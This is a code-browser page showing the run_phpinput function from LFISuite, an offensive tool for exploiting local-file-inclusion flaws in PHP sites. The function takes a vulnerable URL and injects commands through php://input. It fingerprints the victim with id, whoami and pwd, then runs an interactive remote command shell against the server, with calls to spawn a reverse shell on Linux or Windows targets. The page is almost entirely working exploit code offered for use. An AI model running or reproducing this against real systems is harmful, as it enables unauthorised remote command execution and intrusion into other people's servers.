MCPcopy
hub / github.com/D35m0nd142/LFISuite / run_phpinput

Function run_phpinput

lfisuite.py:1217–1277  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

1215 return got[:-1]
1216
1217def run_phpinput():
1218 global ahurl
1219 global ahactive
1220 global victimOs
1221
1222 if(ahactive is False):
1223 inputurl = raw_input("[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> ")
1224 else:
1225 inputurl = ahurl
1226
1227 inputurl = checkHttp(inputurl)
1228 inputurl = cutURLToLastEqual(inputurl)
1229 resp = send_phpinput_cmd("echo Bodom", inputurl)
1230 got = SubstrFind(resp,"AbracadabrA **")
1231 phpcmd = False
1232
1233 if(len(got) == 0):
1234 return
1235 if("system() has been disabled for security reasons in" in resp):
1236 phpcmd = True
1237
1238 point = got[0]+15
1239 print "\n[+] The website seems to be vulnerable. Opening a Shell.."
1240
1241 if(phpcmd is False):
1242 _id = cleanOutput(extract_phpinput_res(send_phpinput_cmd("id",inputurl)), True)
1243 if(len(_id) == 0):
1244 path = cleanOutput(extract_phpinput_res(send_phpinput_cmd("path",inputurl)), True)
1245 if(checkIfWindows(path)):
1246 victimOs = "Windows"
1247
1248 print colored("[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),\"content\");]\n","red")
1249 whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("whoami",inputurl)), True))
1250 if(victimOs != "Windows"):
1251 pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("pwd",inputurl)), True)
1252 else:
1253 pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("cd",inputurl)), True)
1254 else:
1255 onlyPhpPrint()
1256 whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://get_current_user();",inputurl)), True))
1257 pwd = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://getcwd();",inputurl)), True))
1258
1259 time.sleep(1)
1260 inputmain = removeHttpFromWebsite(extractWebsiteFromUrl(inputurl))
1261 cmd = ""
1262 while(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"):
1263 if(phpcmd):
1264 cmd = raw_input("%s@%s:%s$ PHP:// " %(whoami,inputmain,pwd))
1265 if(cmd[:6] != "php://"):
1266 cmd = "php://%s" %cmd
1267 else:
1268 cmd = raw_input("%s@%s:%s$ " %(whoami,inputmain,pwd))
1269 if(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"):
1270 if(phpcmd is False and checkIfReverseShell(cmd)):
1271 if(victimOs != "Windows"):
1272 phpinput_reverse_shell(inputurl)
1273 else:
1274 windows_phpinput_reverse_shell(inputurl)

Callers 2

run_autoHackFunction · 0.85
lfisuite.pyFile · 0.85

Calls 15

checkHttpFunction · 0.85
cutURLToLastEqualFunction · 0.85
send_phpinput_cmdFunction · 0.85
SubstrFindFunction · 0.85
cleanOutputFunction · 0.85
extract_phpinput_resFunction · 0.85
checkIfWindowsFunction · 0.85
isUnknownFunction · 0.85
onlyPhpPrintFunction · 0.85
removeHttpFromWebsiteFunction · 0.85
extractWebsiteFromUrlFunction · 0.85
checkIfReverseShellFunction · 0.85

Tested by

no test coverage detected